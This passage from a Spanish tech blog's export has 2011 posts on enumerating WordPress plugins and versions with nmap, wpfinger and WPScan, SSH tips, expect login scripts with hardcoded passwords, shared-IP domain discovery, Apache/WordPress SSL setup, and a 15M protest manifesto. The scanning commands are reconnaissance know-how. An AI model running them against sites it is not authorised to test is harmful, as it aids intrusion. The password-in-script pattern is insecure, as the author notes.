--script=http-wp-plugins --script-arg http-wp-plugins.root=\u0026#34;/blog/\u0026#34;,http-wp-plugins.search=500 mydomain.com PORT STATE SERVICE 80/tcp open http | http-wp-plugins: | search amongst the 500 most popular plugins | all-in-one-seo-pack | akismet | si-contact-form | wp-super-cache | google-sitemap-generator | yet-another-related-posts-plugin | google-analytics-for-wordpress | maintenance-mode | broken-link-checker | feedburner-plugin | exploit-scanner |_ secure-wordpress Mediante la opción http-wp-plugins.root=\u0026quot;/blog/\u0026quot; le decimos al complemento que la ruta relativa al WordPress es /blog/, es decir, mydomain.com/blog/, y con http-wp-plugins.search=500 que busque los 500 primeros complementos de la lista. Si quisiéramos que los buscase todos, pondríamos all.\nCómo \u0026ldquo;protegernos\u0026rdquo; Una medida para evitar que un atacante pueda recabar información de los complementos que tenemos instalados es añadir al archivo de configuración del sitio de Apache, /usr/share/wordpress/wp-content, las siguientes directivas:\nOrder Deny,Allow Deny from All Options FollowSymLinks AllowOverride None Y reiniciamos el servicio.\nDespués de estos cambios, el resultado será que que, para el script, todos los complementos están instalados, ya que el acceso a estos directorios está prohibido (error 403).\n$ nmap -p80 --script=http-wp-plugins --script-arg http-wp-plugins.root=\u0026#34;/blog/\u0026#34;,http-wp-plugins.search=10 mydomain.com PORT STATE SERVICE 80/tcp open http | http-wp-plugins: | search amongst the 10 most popular plugins | gtranslate | all-in-one-seo-pack | contact-form-7 | google-analyticator | akismet | wptouch | si-contact-form | wp-super-cache | add-to-any |_ sexybookmarks Éstos se corresponden justamente con las 10 primeras entradas del diccionario:\n$ head /usr/share/nmap/nselib/data/wp-plugins.lst gtranslate all-in-one-seo-pack contact-form-7 google-analyticator akismet wptouch si-contact-form wp-super-cache add-to-any sexybookmarks Sin embargo, esta medida no llega a ser una medida realmente efectiva ya que:\nalgunos complementos dejarán de funcionar de forma correcta. Los que incluyan archivos estáticos tales como CSS o Javascript dentro de sus directorios no podrán cargarlos, por lo que no se verán como estaba pensado o dejarán de funcionar correctamente no deja de ser una medida de seguridad por oscuridad, ya que ocultar lo que tenemos no nos hace más seguros, sino más confiados, y seguramente se pueden seguir identificando algunos de los complementos que tenemos instalados inspeccionando el código fuente de la página. Lo mejor sería tener nuestro WordPress actualizado, utilizar complementos de fuentes fiables y que se actualicen regularmente.\nUsando wpfinger wpfinger es una herramienta que analiza el repositorio de complementos de WordPress y genera firmas basadas en las diferencias entre cada versión de cada complemento. Mediante estas firmas puede detectar la presencia de cualquier complemento del repositorio, y probablemente la versión concreta, en una página web.\nPara instalarlo desde el repositorio Git:\n$ git clone https://code.google.com/p/wpfinger/ Para realizar un escaneo:\n$ ./wpfinger.py http://localhost/wordpress/ Detected 404 as default response code. Installed plugins: google-analytics-for-wordpress: trunk si-contact-form: 2.9.7.1 add-to-any: 0.9.9.9.4 - trunk all-in-one-seo-pack: trunk wp-super-cache: 0.9.9.4 yet-another-related-posts-plugin: 3.3.1 akismet: trunk google-sitemap-generator: trunk broken-link-checker: trunk maintenance-mode: trunk secure-wordpress: 2.0.1 feedburner-plugin: trunk post-plugin-library: 2.5.0.5 exploit-scanner: 1.0.5 - trunk wp-syntax: trunk login-lockdown: 1.5 - trunk wp-jquery-lightbox: 1.2.1 nktagcloud: 0.99.5 - trunk wp-paginate: trunk Usando wpscan WPScan es un escáner de vulnerabilidades que comprueba la seguridad de una instalación de WordPress utilizando un enfoque de caja negra. Puede listar usuarios, romper claves débiles, mostrar la versión de WordPress instalada, mostrar los complementos instalados y las vulnerabilidades que puedan tener, además de otra información.\nAntes de descargar el código del repositorio SVN, necesitaremos instalar las dependencias:\n$ sudo aptitude install libcurl4-gnutls-dev libxml-simple-ruby $ sudo gem install typhoeus $ svn checkout http://wpscan.googlecode.com/svn/trunk/ wpscan-read-only Si queremos realizar una comprobación no intrusiva que muestre la versión de WordPress y el tema instalado:\n$ ruby wpscan-read-only/wpscan.rb --url http://localhost/wordpress ____________________________________________________ __ _______ _____ \\ \\ / / __ \\ / ____| \\ \\ /\\ / /| |__) | (___ ___ __ _ _ __ \\ \\/ \\/ / | ___/ \\___ \\ / __|/ _` | \u0026#39;_ \\ \\ /\\ / | | ____) | (__| (_| | | | | \\/ \\/ |_| |_____/ \\___|\\__,_|_| |_| v1.1 WordPress Security Scanner by ethicalhack3r.co.uk Sponsored by the RandomStorm Open Source Initiative _____________________________________________________ # Copyright (C) 2011 Ryan Dewhurst # This program comes with ABSOLUTELY NO WARRANTY. # This is free software, and you are welcome to redistribute it # under certain conditions. See GNU GPLv3. | URL: http://localhost/wordpress | Started on Sun Sep 18 18:00:35 2011 [+] The WordPress theme in use is called minimalism [+] WordPress version/s \u0026#34;3.2.1\u0026#34; identified from advanced fingerprinting. [+] Finished at Sun Sep 18 18:00:40 2011 Si queremos que nos muestre los complementos instalados:\n$ ruby wpscan-read-only/wpscan.rb --enumerate p --url http://localhost/wordpress ____________________________________________________ __ _______ _____ \\ \\ / / __ \\ / ____| \\ \\ /\\ / /| |__) | (___ ___ __ _ _ __ \\ \\/ \\/ / | ___/ \\___ \\ / __|/ _` | \u0026#39;_ \\ \\ /\\ / | | ____) | (__| (_| | | | | \\/ \\/ |_| |_____/ \\___|\\__,_|_| |_| v1.1 WordPress Security Scanner by ethicalhack3r.co.uk Sponsored by the RandomStorm Open Source Initiative _____________________________________________________ # Copyright (C) 2011 Ryan Dewhurst # This program comes with ABSOLUTELY NO WARRANTY. # This is free software, and you are welcome to redistribute it # under certain conditions. See GNU GPLv3. | URL: http://localhost/wordpress | Started on Sun Sep 18 18:09:31 2011 [+] The WordPress theme in use is called minimalism [+] WordPress version/s \u0026#34;3.2.1\u0026#34; identified from advanced fingerprinting. [+] Enumerating installed plugins... Checking for 2162 total plugins... 1% complete. ","permalink":"http://karpoke.ignaciocano.com/2011/06/20/identificando-los-plugins-de-wordpress-instalados/","summary":"\u003cp\u003eHay un \u003cem\u003escript\u003c/em\u003e para \u003ccode\u003enmap\u003c/code\u003e, \u003ca href=\"http://seclists.org/nmap-dev/2011/q1/att-806/http-wp-plugins.nse\"\u003ehttp-wp-plugins\u003c/a\u003e, que permite \u003ca href=\"http://blog.alexos.com.br/?p=2302\"\u003edetectar\nlos complementos instalados en WordPress\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eDicho \u003cem\u003escript\u003c/em\u003e intenta acceder a los directorios de los complementos en\n\u003ccode\u003ewp-content/plugins/\u003c/code\u003e con la ayuda de un \u003ca href=\"http://seclists.org/nmap-dev/2011/q1/att-806/wp-plugins_lst_tar.gz\"\u003ediccionario\u003c/a\u003e. Si la\nrespuesta no es un error 404 interpreta que el directorio, y por tanto\nel complemento, existe. La lista de complementos para WordPress es extensa,\ncasi 13405 entradas, y podría llevar bastante tiempo analizarlas todas,\npor lo que las entradas están ordenadas por popularidad y por defecto\nsólo se escanean las 100 primeras.\u003c/p\u003e","title":"Identificando los plugins de WordPress instalados"},{"content":"Secuencias de escape en SSH:\nuser@remotehost:~$ ~? Supported escape sequences: ~. - terminate connection (and any multiplexed sessions) ~B - send a BREAK to the remote system ~C - open a command line ~R - Request rekey (SSH protocol 2 only) ~^Z - suspend ssh ~# - list forwarded connections ~\u0026amp; - background ssh (when waiting for connections to terminate) ~? - this message ~~ - send the escape character by typing it twice (Note that escapes are only recognized immediately after newline.) La primera, ~., se puede utilizar para cerrar la sesión cuando se nos queda colgada, por ejemplo, al reiniciar la máquina remota.\nPodemos hacer que nos muestre una consola:\nuser@remotehost:~$ ~C ssh\u0026gt; help Commands: -L[bind_address:]port:host:hostport Request local forward -R[bind_address:]port:host:hostport Request remote forward -D[bind_address:]port Request dynamic forward -KR[bind_address:]port Cancel remote forward O que nos muestre las conexiones abiertas:\nuser@remotehost:~$ ~# The following connections are open: #1 client-session (t4 r0 i0/0 o0/0 fd 5/6 cc -1) Si estamos compartiendo una conexión SSH, y nos conectamos desde otro terminal, veremos algo parecido a esto:\nuser@remotehost:~$ ~# The following connections are open: #1 client-session (t4 r0 i0/0 o0/0 fd 5/6 cc -1) #3 client-session (t4 r1 i0/0 o0/0 fd 9/10 cc 2) ","permalink":"http://karpoke.ignaciocano.com/2011/06/18/secuencias-de-escape-en-ssh/","summary":"\u003cp\u003eSecuencias de escape en SSH:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003euser@remotehost:~$ ~?\nSupported escape sequences:\n  ~.  - terminate connection (and any multiplexed sessions)\n  ~B  - send a BREAK to the remote system\n  ~C  - open a command line\n  ~R  - Request rekey (SSH protocol 2 only)\n  ~^Z - suspend ssh\n  ~#  - list forwarded connections\n  ~\u0026amp;  - background ssh (when waiting for connections to terminate)\n  ~?  - this message\n  ~~  - send the escape character by typing it twice\n(Note that escapes are only recognized immediately after newline.)\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eLa primera, \u003ccode\u003e~.\u003c/code\u003e, se puede utilizar para \u003ca href=\"http://www.commandlinefu.com/commands/view/8665/control-ssh-connection\"\u003ecerrar la sesión cuando se nos\nqueda colgada\u003c/a\u003e, por ejemplo, al reiniciar la máquina remota.\u003c/p\u003e","title":"Secuencias de escape en SSH"},{"content":"Como parte del #15m me declaro una persona pacífica y condeno radicalmente todo tipo de violencia: la de los violentos infiltrados en nuestras manifestaciones, y la del Estado, que ha causado más dolor y heridos. Además, condeno la manipulación mediática que enfatiza la información sesgada, parcial o errónea con el propósito de demonizar a los ciudadanos.\nSi me manifiesto en la calle es porque:\n-Mi participación como ciudadano se ha reducido a votar a listas cerradas cada cuatro años para ver cómo los representantes de los ciudadanos no respetan lo prometido en su programa.\n-Se hacen leyes a favor de grupos de interés en vez de hacerlas a favor del conjunto de la sociedad.\n-Se invierten recursos públicos para ayudar a minorías poderosas, y no a quienes están pasando situaciones desesperadas ocasionadas por la especulación financiera.\n-Los grandes partidos están más preocupados por mantener su poder que por ofrecer soluciones para superar esta crisis histórica.\n-Está a punto de firmarse un \u0026ldquo;Pacto del Euro\u0026rdquo; que consiste fundamentalmente en medidas para reducir la inversión pública en servicios esenciales.\n-Desde diferentes órganos del estado se ha insultado a los ciudadanos, e incluso se ha justificado el recurso a la violencia contra manifestantes pacíficos.\nComo parte del #15m, acepto y respeto la diversidad ideológica del movimiento. Cuando participo en una manifestación no reclamo un régimen o una ideología en concreto, ni un modelo social no democrático, ni la eliminación de los partidos o los parlamentos. Lo que reclamo es una democracia mejor y más humana que, entre otras medidas, necesita urgentemente:\n-Cambios en la Ley Electoral para permitir una mejor y más directa representación de los ciudadanos en los parlamentos y una mayor participación ciudadana en las decisiones importantes.\n-Aprobación de una Ley de Transparencia y Acceso a la Información Pública para obligar a la publicación en formatos adecuados y reutilizables de todos los gastos, decisiones y reuniones con grupos de presión por parte de funcionarios y cargos públicos.\n-Tolerancia cero a la corrupción de candidatos y cargos públicos, y controles ciudadanos para la exigencia de responsabilidad política.\n-Separación clara, real y efectiva de los poderes del estado.\n-Control fiscal efectivo de grandes fortunas y operaciones financieras; eliminación de privilegios fiscales a cargos electos.\n-Políticas encaminadas a solucionar de forma efectiva los problemas hipotecarios y de vivienda.\n-Servicios públicos de calidad, fundamentalmente salud, justicia y educación.\n-Eliminación de las leyes que permiten el control administrativo de Internet. La red ha demostrado ser esencial para la libertad de expresión y para responder al peligro de manipulación mediática.\nPor todas estas razones volveré a salir pacíficamente a la calle el 19 de junio, #19j.\nSi estás de acuerdo, aprópiate del texto y divúlgalo (enlace al documento original).\n","permalink":"http://karpoke.ignaciocano.com/2011/06/18/yo-soy15m/","summary":"\u003cp\u003eComo parte del #15m me declaro una persona pacífica y condeno\nradicalmente todo tipo de violencia: la de los violentos infiltrados en\nnuestras manifestaciones, y la del Estado, que ha causado más dolor y\nheridos. Además, condeno la manipulación mediática que enfatiza la\ninformación sesgada, parcial o errónea con el propósito de demonizar a\nlos ciudadanos.\u003c/p\u003e\n\u003cp\u003eSi me manifiesto en la calle es porque:\u003c/p\u003e\n\u003cp\u003e-Mi participación como ciudadano se ha reducido a votar a listas\ncerradas cada cuatro años para ver cómo los representantes de los\nciudadanos no respetan lo prometido en su programa.\u003c/p\u003e","title":"Yo #soy15m"},{"content":"A partir de la versión 4 de OpenSSH se pueden compartir las conexiones seguras a un máquina remota, de tal manera que, una vez establecida la primera conexión, el resto de conexiones reutilizan la primera, por lo que el establecimiento de la conexión de éstas será mucho más rápido.\nConfiguración Lo primero es asegurarnos de que existe el directorio ~/.ssh en el cliente, con permisos 700 (sólo accesible por nosotros mismos\u0026hellip; y cualquier administrador).\nA continuación, añadimos las siguientes líneas al fichero ~/.ssh/config:\nHost * ControlPath ~/.ssh/master-%l-%r@%h:%p ControlMaster auto Host * especifica que se aplica a cualquier máquina remota, ControlMaster auto especifica que se reutilice una conexión existente, si es posible, y ControlPath ~/.ssh/master-%l-%r@%h:%p especifica dónde se debe crear el fichero de _socket_ que representa la conexión maestra. `%r` se sustituye por el nombre de usuario, `%h` por el nombre de la máquina remota, `%p` por el puerto remoto y `%l` por el nombre de la máquina local, que, aunque sólo es útil si el directorio se puede montar en varias máquinas (por ejemplo, si el directorio de usuario se monta por NFS), no molesta si se incluye siempre. Comparación de tiempos Para la primera conexión:\n$ time ssh user@remote exit real 0m1.217s user 0m0.012s sys 0m0.004s Para las siguientes conexiones:\n$ time ssh user@remote exit real 0m0.168s user 0m0.008s sys 0m0.012s La diferencia es notable. Para evitar que nos pida la contraseña y tener que introducirla manualmente, podemos utilizar el inicio de sesión por clave, o recurrir al comando expect para evitar introducir la contraseña.\nLas siguientes conexiones Si estamos haciendo estas pruebas utilizando algunos de los scripts que se basan en expect es posible que nos de un error o un al intentar enviar la contraseña, ya que mientras estemos haciendo uso de la conexión compartida, para las siguientes conexiones no será necesario introducir la contraseña.\nAdemá, dado que se reutiliza la conexión maestra, si queremos conectarnos utilizando diferentes parámetros deberemos crear una conexión nueva, utilizando el argumento -S none:\n$ ssh -S none -X user@remote Ficheros de socket Si no finalizamos la conexión correctamente, es posible que el fichero de socket no se elimine correctamente, lo que puede provocar que no nos permita volver a conectarnos:\nControl socket connect(/home/user/.ssh/master-remote-local@example.net:1234): Connection refused ControlSocket /home/user/.ssh/master-remote-local@example.net:1234 already exists Simplemente debemos eliminar estos ficheros para solucionarlo.\nSalir de la sesión maestra mientras hay otras conexiones Si salimos de la sesión maestra mientras hay más conexiones abiertas, la primera quedará colgada hasta que terminen el resto de sesiones. Una posible solución para evitar este inconveniente es realizar la conexión maestra utilizando el argumento -N para que no nos ofrezca un terminal, y matar el proceso cuando ya no la necesitemos.\n","permalink":"http://karpoke.ignaciocano.com/2011/06/17/compartiendo-una-conexion-por-ssh/","summary":"\u003cp\u003eA partir de la versión 4 de OpenSSH se pueden \u003ca href=\"http://protempore.net/~calvins/howto/ssh-connection-sharing/\"\u003ecompartir las conexiones\nseguras\u003c/a\u003e a un máquina remota, de tal manera que, una vez establecida\nla primera conexión, el resto de conexiones reutilizan la primera, por\nlo que el establecimiento de la conexión de éstas será mucho más rápido.\u003c/p\u003e\n\u003ch2 id=\"configuración\"\u003eConfiguración\u003c/h2\u003e\n\u003cp\u003eLo primero es asegurarnos de que existe el directorio \u003ccode\u003e~/.ssh\u003c/code\u003e en el\ncliente, con permisos 700 (sólo accesible por nosotros mismos\u0026hellip; y\ncualquier administrador).\u003c/p\u003e","title":"Compartiendo una conexión por SSH"},{"content":"expect es un comando que \u0026ldquo;habla\u0026rdquo; con otros programas interactivos. Se definen unas reglas en función de lo que esperamos que nos digan esos programas y lo que queremos contestar.\nUn típico ejemplo es realizar una conexión a un servicio de FTP o SSH, y utilizar expect para que introduzca la contraseña por nosotros y lleve a cabo diferentes acciones. La ventaja que tiene es que podemos automatizar acciones en esos servicios. El gran inconveniente es que, si esos servicios requieren autenticación, deberemos escribir la contraseña, ya sea en un script o directamente en el terminal, pudiendo quedar reflejada en el historial. (Dependiendo de la configuración, si incluimos espacios antes de ejecutar un comando, éste no queda reflejado en el historial).\nConectarse a un servidor SSH y mostrar una consola interactiva Aunque el resultado pueda ser similar a conectarse utilizando la clave, ya que no nos pedirá contraseña, el nivel de seguridad es muy diferente, no sólo por lo que ya hemos comentado, sino porque nuestra contraseña seguramente es más débil que una clave RSA (de al menos 2048 bits). Siempre que sea posible, es preferible utilizar una clave para conectarnos.\nEl siguiente script muestra cómo podemos conectarnos utilizando el usuario y la contraseña escritos en el propio script:\n#!/usr/bin/env expect # http://ubuntuforums.org/showpost.php?p=5433300\u0026amp;postcount=5 #trap sigwinch and pass it to the child we spawned trap { set rows [stty rows] set cols [stty columns] stty rows $rows columns $cols \u0026lt; $spawn_out(slave,name) } WINCH set username yourUserNameHere set pass yourPasswordHere set host theIpAddressToConnectTo spawn ssh ${username}@${host} expect -re \u0026#34;password:\u0026#34; send \u0026#34;${pass}\\r\u0026#34; expect -re \u0026#34;$\u0026#34; # now interact with the session interact Podríamos modificar el script para que nos pida los parámetros, y pasárselos como argumentos desde el terminal. Deberíamos cambiar las líneas dónde se definen dichas variables por:\nset username [lrange $argv 0 0] set pass [lrange $argv 1 1] set host [lrange $argv 2 2] Y desde el terminal, lo invocaríamos mediante:\n$ ./sshlogin.ssh username pass host Conectarse a un servidor SSH, ejecutar un comando y salir Otra opción es que nos queramos conectar para ejecutar un comando, ver el resultado y salir. Un sencillo script que nos permite hacer esto es el siguiente:\n#!/usr/bin/expect -f # http://bash.cyberciti.biz/security/expect-ssh-login-script/ set user [lrange $argv 0 0] set ip_or_domain [lrange $argv 1 1] set password [lrange $argv 2 2] set scriptname [lrange $argv 3 3] set arg1 [lrange $argv 4 4] set timeout -1 # now connect to remote UNIX box (ip_or_domain) with given script to execute spawn ssh $user@$ip_or_domain $scriptname $arg1 match_max 100000 # Look for passwod prompt expect \u0026#34;*?assword:*\u0026#34; # Send password aka $password send -- \u0026#34;$password\\r\u0026#34; # send blank line (\\r) to make sure we get back to gui send -- \u0026#34;\\r\u0026#34; expect eof Para ejecutarlo:\n$ ./sshlogin.exp user host pass who La principal diferente entre estos dos scripts es que, después de enviar la contraseña, uno espera a que se muestre el prompt para iniciar una sesión interactiva mediante la orden interact y el otro simplemente cierra la sesión.\nUtilizar expect en el terminal También podríamos ejecutar expect directamente en el terminal de la siguiente manera:\n$ expect -c \u0026#34; set password pass spawn ssh user@host who match_max 100000 expect \\\u0026#34;_?assword:_\\\u0026#34; send -- \\\u0026#34;${password}\\r\\\u0026#34; send -- \\\u0026#34;\\r\\\u0026#34; expect eof \u0026#34; ","permalink":"http://karpoke.ignaciocano.com/2011/06/17/conectarse-por-ssh-utilizando-expect/","summary":"\u003cp\u003e\u003ccode\u003eexpect\u003c/code\u003e es un comando que \u0026ldquo;habla\u0026rdquo; con otros programas interactivos. Se\ndefinen unas reglas en función de lo que esperamos que nos digan esos\nprogramas y lo que queremos contestar.\u003c/p\u003e\n\u003cp\u003eUn típico ejemplo es realizar una conexión a un servicio de FTP o SSH, y\nutilizar \u003ccode\u003eexpect\u003c/code\u003e para que introduzca la contraseña por nosotros y lleve\na cabo diferentes acciones. La ventaja que tiene es que podemos\nautomatizar acciones en esos servicios. El gran inconveniente es que, si\nesos servicios requieren autenticación, deberemos escribir la\ncontraseña, ya sea en un \u003cem\u003escript\u003c/em\u003e o directamente en el terminal,\npudiendo quedar reflejada en el historial. (Dependiendo de la\nconfiguración, si incluimos espacios antes de ejecutar un comando, éste\nno queda reflejado en el historial).\u003c/p\u003e","title":"Conectarse por SSH utilizando expect"},{"content":"Éste es algo viejuno, pero lo no había probado. Se trata del script bing-ip2hosts, que permite encontrar los dominios que comparten IP con un dominio dado utilizando Bing:\n$ ./bing-ip2hosts -p ubuntu.com http://brainstorm.ubuntu.com http://kubuntu.org http://search.ubuntu.com http://www.ubuntu.com Con el argumento -p se incluye el prefijo http://, lo cual viene bien para poder clicar directamente en el terminal.\nEste script utiliza el comando resolveip para encontrar la IP del dominio dado:\n$ resolveip google.com IP address of google.com is 209.85.146.147 IP address of google.com is 209.85.146.99 IP address of google.com is 209.85.146.104 IP address of google.com is 209.85.146.106 IP address of google.com is 209.85.146.103 IP address of google.com is 209.85.146.105 $ resolveip -s google.com 209.85.229.147 Y parsea los resultados del buscador Bing pasándole como parámetro la IP recién obtenida:\nhttp://m.bing.com/search/search.aspx?A=webresults\u0026amp;Q=ip%3a209.85.229.147\u0026amp;D=Web\u0026amp;SI=0 ","permalink":"http://karpoke.ignaciocano.com/2011/06/14/encontrar-los-dominios-que-comparten-ip-con-otro-dado/","summary":"\u003cp\u003eÉste es algo viejuno, pero lo no había probado. Se trata del \u003cem\u003escript\u003c/em\u003e\n\u003ccode\u003ebing-ip2hosts\u003c/code\u003e, que permite \u003ca href=\"http://seifreed.com/2010/04/10/enumerar-todos-los-host-en-dominio-con-la-direccin-ip-bing/\"\u003eencontrar los dominios que comparten IP\u003c/a\u003e\ncon un dominio dado utilizando Bing:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ ./bing-ip2hosts -p ubuntu.com\nhttp://brainstorm.ubuntu.com\nhttp://kubuntu.org\nhttp://search.ubuntu.com\nhttp://www.ubuntu.com\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eCon el argumento \u003ccode\u003e-p\u003c/code\u003e se incluye el prefijo \u003ccode\u003ehttp://\u003c/code\u003e, lo cual viene bien\npara poder clicar directamente en el terminal.\u003c/p\u003e\n\u003cp\u003eEste \u003cem\u003escript\u003c/em\u003e utiliza el comando \u003ccode\u003eresolveip\u003c/code\u003e para encontrar la IP del\ndominio dado:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ resolveip google.com\nIP address of google.com is 209.85.146.147\nIP address of google.com is 209.85.146.99\nIP address of google.com is 209.85.146.104\nIP address of google.com is 209.85.146.106\nIP address of google.com is 209.85.146.103\nIP address of google.com is 209.85.146.105\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ resolveip -s google.com\n209.85.229.147\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eY parsea los resultados del buscador Bing pasándole como parámetro la IP\nrecién obtenida:\u003c/p\u003e","title":"Encontrar los dominios que comparten IP con otro dado"},{"content":"Si tenemos instalado un WordPress y queremos iniciar sesión a través de una conexión segura, deberemos modificar el fichero /usr/share/wordpress/wp-config.php y añadir:\ndefine(\u0026#39;FORCE_SSL_LOGIN\u0026#39;, true); Si queremos que se use la conexión segura en todo el panel de control, en lugar de lo anterior, añadiremos:\ndefine(\u0026#39;FORCE_SSL_ADMIN\u0026#39;, true); Para que esto funcione, es necesario que Apache esté configurado para servir conexiones seguras.\nActualización a 13 de julio de 2013 Si hemos iniciado sesión y navegamos por nuestra página web, deberíamos asegurarnos de que seguimos usando una conexión segura, ya que estamos enviando nuestra cookie de sesión y alguien en la misma red podría llegar a capturarla si no es así.\nEl complemento SSL for logged in users fuerza que los usuarios que han iniciado sesión continúen usando una conexión segura en todo el sitio. Además, con este complemento, ya no será necesario modificar el fichero wp-config.php.\n","permalink":"http://karpoke.ignaciocano.com/2011/06/14/usando-una-conexion-segura-en-el-panel-de-control-de-wordpress/","summary":"\u003cp\u003eSi tenemos \u003ca href=\"/2010/12/30/la-infame-actualizacion-de-wordpress-en-15-segundos/\"\u003einstalado un WordPress\u003c/a\u003e y queremos \u003ca href=\"http://rackerhacker.com/2009/07/31/requiring-ssl-encryption-for-wordpress-administration/\"\u003einiciar sesión a\ntravés de una conexión segura\u003c/a\u003e, deberemos modificar el fichero\n\u003ccode\u003e/usr/share/wordpress/wp-config.php\u003c/code\u003e y añadir:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003edefine(\u0026#39;FORCE_SSL_LOGIN\u0026#39;, true);\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eSi queremos que se use la conexión segura en todo el panel de control,\nen lugar de lo anterior, añadiremos:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003edefine(\u0026#39;FORCE_SSL_ADMIN\u0026#39;, true);\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003ePara que esto funcione, es necesario que \u003ca href=\"/2011/06/14/configurar-apache-para-servir-conexiones-seguras/\"\u003eApache esté configurado para\nservir conexiones seguras\u003c/a\u003e.\u003c/p\u003e\n\u003chr\u003e\n\u003ch4 id=\"actualización-a-13-de-julio-de-2013\"\u003eActualización a 13 de julio de 2013\u003c/h4\u003e\n\u003cp\u003eSi hemos iniciado sesión y navegamos por nuestra página web, deberíamos\nasegurarnos de que seguimos usando una conexión segura, ya que estamos\nenviando nuestra \u003cem\u003ecookie\u003c/em\u003e de sesión y alguien en la misma red podría\nllegar a capturarla si no es así.\u003c/p\u003e","title":"Usando una conexión segura en el panel de control de Wordpress"},{"content":"Si tenemos Apache, y queremos configurarlo para que se pueda navegar de forma segura por nuestro sitio utilizando el protocolo HTTPS, necesitamos:\ncrear las claves que se utilizarán para cifrar la conexión, configurar mod_ssl, el módulo de Apache para usar conexiones seguras, y permitir la conexión por el puerto 443. Crear las claves de cifrado Vamos a generar un par de claves RSA triple DES de 2048 bits en el directorio /etc/ssl:\n$ cd /etc/ssl $ sudo openssl genrsa -des3 -out server.key 2048 Nos pedirá una contraseña y al terminar nos habrá creado la clave server.key que será la que utilizará Apache. Le cambiamos los permisos:\n$ sudo chmod 700 server.key y guardamos una copia en un lugar seguro. Si pensamos utilizar más de un VirtualHost podría ser interesante utilizar el dominio para el nombre de la clave en lugar de server.key.\nCada vez que se inicie Apache nos pedirá la contraseña que acabamos de dar. Si no queremos que nos vuelva a pedir la contraseña, ejecutamos lo siguiente, y utilizamos la nueva clave obtenida:\n$ sudo openssl rsa -in server.key -out new.server.key Nuestra clave necesita estar avalada por alguien, por lo que creamos una petición de firmado de nuestra clave. Que no se nos pase poner la dirección de nuestra web en Common Name.\n$ sudo openssl req -new -key server.key -out server.csr Country Name (2 letter code) [AU]:ES State or Province Name (full name) [Some-State]:IB Locality Name (eg, city) []:Palma de Mallorca Organization Name (eg, company) [Internet Widgits Pty Ltd]:Terminus Common Name (eg, YOUR name) []:terminus.ignaciocano.com Email Address []:karpoke@spamme.com Actualizado el 22 de mayo de 2015 Podemos usar la opción -subj para pasarle esta información directamente al comando openssl:\n$ sudo openssl req -new -key server.key -out server.csr -subj \u0026#39;/C=ES/ST=IB/L=Palma de Mallorca/O=Terminus/CN=terminus.ignaciocano.com/emailAddress=karpoke@spamme.com\u0026#39; También podemos consultar esta información del fichero de petición con la opción -subject:\n$ openssl req -in server.csr -noout -subject subject=/C=ES/ST=IB/L=Palma de Mallorca/O=Terminus/CN=terminus.ignaciocano.com/emailAddress=karpoke@spamme.com Si queremos crear un certificado wildcard, válido para todos los subdominios de un dominio, en Common Name bastará que pongamos algo como por ejemplo *.ignaciocano.com.\nDespués de ejecutar el comando, se habrá creado el fichero con la petición de firmado de nuestra clave, server.csr.\nAhora deberíamos entregar esta petición a una entidad certificadora para que nuestro certificado esté avalado por una CA como Verisign o Thawte, y así evitar que un usuario que acceda a nuestra web le salga el aviso de que el certificado del sitio no puede ser validado. Pero si estamos haciendo pruebas, tenemos dos opciones para nuestra petición, o autofirmarla, o crear una autoridad certificadora (CA) y firmarla.\nAutofirmar la petición Crearemos un certificado autofirmado, server.crt, con una validez de un año:\n$ sudo openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt Country Name (2 letter code) [AU]:ES State or Province Name (full name) [Some-State]:IB Locality Name (eg, city) []:Palma de Mallorca Organization Name (eg, company) [Internet Widgits Pty Ltd]:Terminus Common Name (eg, YOUR name) []:terminus.ignaciocano.com Email Address []:karpoke@spamme.com Crear una autoridad certificadora y firmar el certificado En lugar de autofirmar el certificado, podemos crear una autoridad certificadora utilizando un pequeño script incluido con openssl.\n$ sudo /usr/lib/ssl/misc/CA.sh -newca Country Name (2 letter code) [AU]:ES State or Province Name (full name) [Some-State]:IB Locality Name (eg, city) []:Palma de Mallorca Organization Name (eg, company) [Internet Widgits Pty Ltd]:Terminus CA Organizational Unit Name (eg, section) []: Common Name (eg, YOUR name) []:terminus.ignaciocano.com Email Address []:karpoke@spamme.com Nos pedirá una contraseña para el certificado de nuestra CA. Una vez que termine, se habrá creado el directorio /etc/ssl/demoCA, que contiene el certificado de nuestra CA.\nAlgunos programas tienen problemas con los certificados que no son DER, por lo que convertiremos el nuestro:\n$ sudo openssl x509 -in demoCA/cacert.pem -out demoCA/cacert.der -outform DER Renombramos el fichero del certificado, ya que así lo exige el script que utilizaremos para firmar:\n$ sudo mv server.csr newreq.pem Y firmamos el certificado. Nos pedirá la contraseña que le dimos al certificado de la CA y nos pedirá confirmación para firmar la petición:\n$ sudo /usr/lib/ssl/misc/CA.sh -signreq Volvemos a renombrar el certificado firmado:\n$ sudo mv newcert.pem server.crt Configurar Apache para que use el certificado Movemos el certificado y la clave del servidor a los siguientes directorios:\n$ sudo mv server.crt /etc/ssl/certs/ $ sudo mv server.key /etc/ssl/private/ Activamos el módulo mod_ssl de Apache:\n$ sudo a2enmod ssl Editamos la configuración del sitio por defecto para SSL, en el fichero /etc/apache2/sites-available/default-ssl para que incluya:\nSSLEngine on SSLOptions +FakeBasicAuth +ExportCertData +StrictRequire SSLCertificateFile /etc/ssl/certs/server.crt SSLCertificateKeyFile /etc/ssl/private/server.key El significado de las SSLOptions es el siguiente:\nFakeBasicAuth, permite utilizar los métodos estándar Auth/DBMAuth para controlar el acceso, ExportCertData, exporta las variables de entorno SSL_CLIENT_CERT y `SSL_SERVER_CERT`, StrictRequire, deniega el acceso cuando se utilice SSLRequireSSL o `SSLRequire` Activamos la configuración para que el sitio use SSL:\n$ sudo a2ensite default-ssl Escuchando en el puerto 443 Debemos asegurarnos de que Apache está 